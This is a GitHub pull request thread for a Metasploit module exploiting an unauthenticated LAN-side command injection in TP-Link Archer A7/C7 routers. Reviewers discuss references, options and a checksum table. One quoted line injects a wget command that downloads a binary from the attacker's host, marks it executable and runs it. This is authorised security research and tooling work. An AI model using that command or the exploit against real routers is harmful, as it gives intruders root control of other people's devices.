Archer a7 c7 lan
rapid7/metasploit-framework pull request #13208
Opened 2020-04-07 18:01 UTC by rdomanski

This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on  the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host.
This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro @pedrib + Radek Domanski @rdomanski).

2020-04-08 04:04 UTC, pedrib commented
One of the URL for the Refernces is live: https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo

2020-04-08 04:23 UTC, pedrib requested changes

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +# PR: TODO run metasploit-framework/tools/dev/msftidy.rb tplink_archerc7_lan_rce.rb
This needs to be removed

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +            [ 'URL', '<TODO>'],
One URL to add is:
https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo

I'll add another soon

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +      # PR : we should randomise it then! TODO later once it's working
should be replaced with [rand(0xff),rand(0xff),rand(0xff),rand(0xff)]

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
as per below, it can be http or https, so we need to add something like it is below:
```ruby
"wget #{(datastore['SSL'] ? 'https' : 'http')}://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
```

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +        OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit'])
actually I'm not sure if these are needed? @bcoles they are included with the HttpServer include right?

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +        OptInt.new('SRVPORT', [true, 'Connection port for exploit download', 4445]),
actually I'm not sure if these are needed? @bcoles they are included with the HttpServer include right?

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +# PR: to see and fix the stuff they don't like
same here, it's already done

2020-04-08 04:23 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +            [ 'URL', '<TODO>'],
Here's another to my github:
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb.md
@rdomanski want to add yours too?

2020-04-08 12:58 UTC, rdomanski commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
Actually the wget busybox version on the target doesn't support https connections so the SSL option in the module had to be removed completely.

2020-04-08 13:06 UTC, pedrib commented
ok all done, I'll send the pcap now to your email

2020-04-08 14:29 UTC, pedrib commented
[tplink_archer_a7_c7_lan_rce.pcap.zip](https://github.com/rapid7/metasploit-framework/files/4451017/tplink_archer_a7_c7_lan_rce.pcap.zip)
Pcap attached, tried to submit it via email but gmail kept blocking me

2020-04-09 08:45 UTC, pedrib commented
Please hold on on this, we just found a way to optimise the exploit

2020-04-09 11:16 UTC, pedrib commented
Ok, all done, this is ready for final review and merge! We tested all scenarios, and the pcap shows a successful attempt. This was before the refactoring, but we didn't change any functionality, just removed dead code.

2020-04-09 14:10 UTC, acammack-r7 commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
Can you add some more documentation around these values, like how this table was generated?

2020-04-09 14:17 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
No idea, this was taken off the binary. Probably some custom checksum? Tbh I didn't check for any magic values in it, but I don't think it's a standard algo

2020-04-09 14:21 UTC, rdomanski commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
This table is hardcoded in the vulnerable binary. It is used to calculate the checksum. So we need it to compute a valid checksum value of the message that is sent.

2020-04-09 14:25 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
@acammack-r7 do you want us to add what Radek said above on a code comment?

2020-04-09 14:40 UTC, acammack-r7 commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
@pedrib Yes please, also if there is a short way to describe where this table can be pulled from the binary (or what it's symbol name is) we would greatly appreciate it!

2020-04-09 16:02 UTC, pedrib commented on modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
> +    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
@acammack-r7 done

2020-04-15 16:16 UTC, merged

2020-04-15 16:16 UTC, bwatters-r7 commented
# Release Notes
This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.